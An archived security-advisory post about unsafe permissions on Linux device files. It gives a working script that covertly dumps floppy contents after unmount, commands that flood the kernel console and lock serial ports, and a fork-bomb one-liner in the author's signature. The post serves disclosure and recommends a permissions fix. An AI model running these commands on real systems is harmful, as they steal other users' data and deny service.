First one ---------- Any user can read data from (even not mounted) floppy using "cat /dev/fd0H1440". It isn't dangerous itself, but... Any user may write a script, which periodically checks if floppy has been just unmounted, then dumps it's content to a file. Here's a sample 'floppy collector': -- fdumper -- #!/bin/sh DUMP_DEV=/dev/fd0H1440 MOUNT_DEV=/dev/fd0 LABEL=0 DUMPED=1 while :; do sleep 1 if [ "`mount|grep \"^${MOUNT_DEV}\"`" = "" ]; then if [ "$DUMPED" = "0" ]; then echo "Dumping image #$LABEL..." cat $DUMP_DEV >.fdimage$LABEL let LABEL=LABEL+1 DUMPED=1 fi else DUMPED=0 fi done -- eof -- Also, if there's no floppy in drive, unprivledged user may flood kernel log console (local console by default!!!): [user@host sth]$ while :; do cat /dev/fd0H1440;done & It will generate a lot of kernel messages, which will be logged to /var/log/messages AND to console (default klogd behaviour). Also, every printk(...) (called by fd driver) uses sync() to flush buffers. It will cause abnormal hdd activity. Second one ----------- (not tested with rh 5.0) Ordinary user are allowed to read /dev/ttyS*. Serial ports driver disallows multiple access attempts at the same time, so user may permanently lock choosen port using this command: [user@host user]$ cat /dev/ttyS0 (Ctrl+Z) [user@host user]$ cat /dev/ttyS0 cat: /dev/ttyS0: device is busy Now serial port is in unusable state. That's all? ------------ There are also a lot of other, not-so-common devices, eg. /dev/sequencer, which are world-readable or even world-writable. There's no ANY reason to give ordinary users direct access to hardware devices. It's quite easy (as shown above ;) to obtain an interesting data or cause system failure by reading/writing these devices. Solution... ------------ ls -l /dev/* | grep "r-- " chmod ;) _______________________________________________________________________ Michał Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private] Iterować jest rzeczą ludzką, wykonywać rekursywnie - boską [P. Deustch] =------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] --------=
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:41:32 PDT